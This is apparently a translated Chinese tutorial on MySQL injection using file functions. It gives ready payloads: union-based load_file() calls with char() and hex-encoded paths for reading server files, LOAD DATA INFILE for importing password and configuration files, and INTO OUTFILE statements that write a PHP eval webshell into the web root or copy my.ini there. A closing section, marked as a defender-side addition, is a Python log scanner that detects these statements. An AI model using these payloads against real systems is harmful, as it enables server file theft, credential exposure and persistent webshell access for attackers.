MySQL Injection Heavenly Book: Introduction to Import and Export

Source: Internet
Author: User
Tags: eval, tmp folder, file permissions

Background 3: Import and export operations explained

  1. load_file(): exporting a file

    load_file(file_name): reads the file and returns its contents as a string.

    Conditions of Use:

    A. The database account must have permission to read files, and the file must be fully readable.

    and (select count(*) from mysql.user)>0/* If the page returns normally, the account has read/write permission on mysql.user.

    and (select count(*) from mysql.user)>0/* If an error is returned, the administrator has probably reduced the privileges of the database account.

    B. The file to be read must be located on the server.

    C. The complete path of the file must be specified.

    D. The file to be read must be smaller than max_allowed_packet.

    If the file does not exist or cannot be read for any of the above reasons, the function returns NULL. The hardest condition to meet is permissions: under Windows, if NTFS permissions are set up properly, the relevant files cannot be read, and when a file is accessible only to administrators, load_file() cannot read it out.

    In actual injection, there are two difficult points to solve:

    (1) The absolute physical path.

    (2) Constructing an effective malformed statement (so that the error message reveals the absolute path).

    In many PHP programs, when a wrong query is submitted and display_errors = ON, the program exposes the absolute path of the web directory. Once the path is known, the security of the entire server is severely compromised for a PHP program that can be injected.

    Common paths:

    Http://www.cnblogs.com/lcamry/p/5729087.html

    Example: Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))

    Use hex() to export the file contents; this is especially usable for smb files.

    -1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

    Explanation: "char(99,58,47,98,111,111,116,46,105,110,105)" is the ASCII code of "c:/boot.ini".

    -1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)

    Explanation: the hexadecimal form of "c:/boot.ini" is "0x633a2f626f6f742e696e69".

    -1 union select 1,1,1,load_file(c:\\boot.ini)

    Explanation: the / in the path is replaced with \\.

  2. Importing a file into the database

    The LOAD DATA INFILE statement reads rows from a text file into a table at high speed. The file name must be given as a literal string.

    During injection we often need certain special files, such as configuration files, password files and so on. When you have the required database privileges, you can import system files into the database with LOAD DATA INFILE.

    Detailed description: the parameters are not repeated here; refer to the MySQL documentation. (Reminder: the reference documentation is the best learning material.)

    Example: LOAD DATA INFILE '/tmp/t0.txt' IGNORE INTO TABLE t0 CHARACTER SET gbk FIELDS TERMINATED BY '\t' LINES TERMINATED BY '\n'

    This imports /tmp/t0.txt into the t0 table. CHARACTER SET gbk sets the character set to GBK, FIELDS TERMINATED BY is the delimiter between data items, and LINES TERMINATED BY is the line terminator.

    When the error code is 2, the file does not exist; when the error code is 13, there is no permission, and you can consider using the /tmp folder instead.

    TIPS: The MySQL 5.7 documentation shows that LOAD XML has been added; whether it can also be used for injection still needs to be verified.

  3. Exporting to a file

    SELECT ... INTO OUTFILE 'file_name'

    The selected rows are written to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. file_name cannot be a file that already exists.

    We generally have two forms of utilization.

    The first is to write the SELECT content directly into a file:

    SELECT version() INTO OUTFILE "c:\\phpnow\\htdocs\\test.php"

    Replace version() here with a one-liner, <?php @eval($_POST["Mima"])?>

    SELECT '<?php @eval($_POST["Mima"])?>' INTO OUTFILE "c:\\phpnow\\htdocs\\test.php"

    Simply concatenate the one-liner. In fact, the SELECT content is not limited to a one-liner; a large amount of content can be uploaded this way.

    The second is to modify the line ending of the file:

    SELECT version() INTO OUTFILE "c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x<hex-encoded file content>

    Explanation: lines normally end with '\r\n'; here we change the terminator to whatever file content we want. FIELDS TERMINATED BY can be used in the same way.

    The hex content can be a one-liner or any other code, constructed as you like. sqlmap's os-shell uses exactly this approach; for details see the os-shell analysis article: http://www.cnblogs.com/lcamry/p/5505110.html

    TIPS:

    (1) Pay attention to escaping in the file path; this depends on the specific environment.

    (2) We mentioned load_file() above, but when the current site cannot export data, we can use the following statement:

    SELECT load_file('C:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini') INTO OUTFILE 'c:\\wamp\\www\\test.php'

    This statement writes the contents of a file on the server into a directory under the web server, so that the data can be retrieved. The my.ini above contains password entries (although they are commented out by default); there is certainly much more content that can be exported, and such knowledge should be accumulated in ordinary practice.
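    As a defender-side addition that is not part of the original post: the three file primitives discussed above (load_file(), LOAD DATA INFILE and SELECT ... INTO OUTFILE) all leave distinctive traces in the MySQL general query log, and the char()/0x encodings the post uses for paths can be decoded back to plain text. The script below scans constructed general-log lines (the timestamps, thread ids and queries are constructed samples, not from any real server) and reports each file operation together with the decoded path.

```python
import re

# Constructed general-log sample; the queries mirror the statements discussed in the post.
SAMPLE_LOG = r"""
2024-01-01T10:00:00.000001Z    12 Query     SELECT id,title FROM news WHERE id=7
2024-01-01T10:00:01.000002Z    12 Query     SELECT id,title FROM news WHERE id=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
2024-01-01T10:00:02.000003Z    13 Query     SELECT id,title FROM news WHERE id=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
2024-01-01T10:00:03.000004Z    14 Query     SELECT version() INTO OUTFILE "c:\\phpnow\\htdocs\\test.php"
2024-01-01T10:00:04.000005Z    15 Query     LOAD DATA INFILE '/tmp/t0.txt' IGNORE INTO TABLE t0
"""
# File-access primitives that the FILE privilege unlocks.
FILE_OPS = re.compile(
    r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b|\bload\s+data\s+(?:local\s+)?infile\b", re.I)
# Literal encodings used to hide a path from naive quote filtering.
CHAR_LIT = re.compile(r"\bchar\s*\(([\d\s,]+)\)", re.I)
HEX_LIT = re.compile(r"\b0x([0-9a-f]+)\b", re.I)
LOG_LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")


def decode_literals(query: str) -> list:
    """Turn char(99,58,...) and 0x633a... literals back into readable strings."""
    found = []
    for m in CHAR_LIT.finditer(query):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        found.append("".join(chr(c) for c in codes))
    for m in HEX_LIT.finditer(query):
        digits = m.group(1)
        if len(digits) % 2 == 0:  # odd-length hex is not a MySQL string literal
            found.append(bytes.fromhex(digits).decode("latin-1"))
    return found


def classify(query: str):
    """Return the file primitive used ('load_file', 'into outfile', ...) or None."""
    m = FILE_OPS.search(query)
    if not m:
        return None
    return re.sub(r"\s+", " ", m.group(0).lower().rstrip("( ").strip())


def find_file_operations(log_text: str) -> list:
    """Scan general-log lines and report every query that touches the filesystem."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        thread, query = int(m.group(1)), m.group(2)
        op = classify(query)
        if op:
            hits.append({"thread": thread, "op": op, "query": query, "decoded": decode_literals(query)})
    return hits
```

    Feeding the real general log (or audit-plugin output) through find_file_operations() gives an alert list keyed by connection thread; on a hardened server the same statements would also fail outright if secure_file_priv is set and the application account lacks the FILE privilege.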
